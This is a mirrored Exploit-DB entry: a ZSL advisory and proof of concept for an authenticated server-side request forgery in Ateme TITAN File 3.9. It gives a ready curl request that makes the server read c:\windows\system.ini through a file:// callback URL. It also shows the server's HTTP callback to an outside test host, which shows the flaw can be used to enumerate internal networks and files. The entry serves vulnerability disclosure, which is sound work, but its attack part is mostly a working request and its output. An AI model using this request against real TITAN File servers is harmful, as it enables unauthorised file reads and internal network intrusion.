bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/51582.txt
Exploit-DB 00f5021452 DB: 2023-07-12 
10 changes to exploits/shellcodes/ghdb

Ateme TITAN File 3.9 - SSRF File Enumeration

Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)

Spring Cloud 3.2.2 - Remote Command Execution (RCE)

BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)

Park Ticketing Management System 1.0  - 'viewid' SQL Injection

Park Ticketing Management System 1.0 - 'viewid' SQL Injection

Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)

AVG Anti Spyware 7.5 - Unquoted Service Path _AVG Anti-Spyware Guard_

Game Jackal Server v5 - Unquoted Service Path _GJServiceV5_
MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTAgentService_
MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTSchedulerService_
2023-07-12 00:16:54 +00:00

71 lines
No EOL
2.1 KiB
Text
Raw Blame History

#Exploit Title: Ateme TITAN File 3.9 - SSRF File Enumeration
#Exploit Author: LiquidWorm
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.9.12.4
3.9.11.0
3.9.9.2
3.9.8.0
Summary: TITAN File is a multi-codec/format video transcoding
software, for mezzanine, STB and ABR VOD, PostProduction, Playout
and Archive applications. TITAN File is based on ATEME 5th Generation
STREAM compression engine and delivers the highest video quality
at minimum bitrates with accelerated parallel processing.
Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability
exists in the Titan File video transcoding software. The application
parses user supplied data in the job callback url GET parameter. Since
no validation is carried out on the parameter, an attacker can specify
an external domain and force the application to make an HTTP/DNS/File
request to an arbitrary destination. This can be used by an external
attacker for example to bypass firewalls and initiate a service, file
and network enumeration on the internal network through the affected
application.
Tested on: Microsoft Windows
NodeJS
Ateme KFE Software
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5781
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php
22.04.2023
--
curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \
-H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \
-H "User-Agent: sunee-mode" \
"https://10.0.0.8/cmd?data=<callback_test><url><!\[CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url><state><!\[CDATA\[encoding\]\]></state></callback_test>"
Call to file://C:\\windows\\system.ini returned 0
---
HTTP from Server
----------------
POST / HTTP/1.1
Host: ssrftest.zeroscience.mk
Accept: */*
Content-Type: application/xml
Content-Length: 192
<?xml version='1.0' encoding='UTF-8' ?>
<update>
<id>0000</id>
<name>dummy test job</name>
<status>aborted</status>
<progress>50</progress>
<message>message</message>
</update>
Reference in a new issue View git blame Copy permalink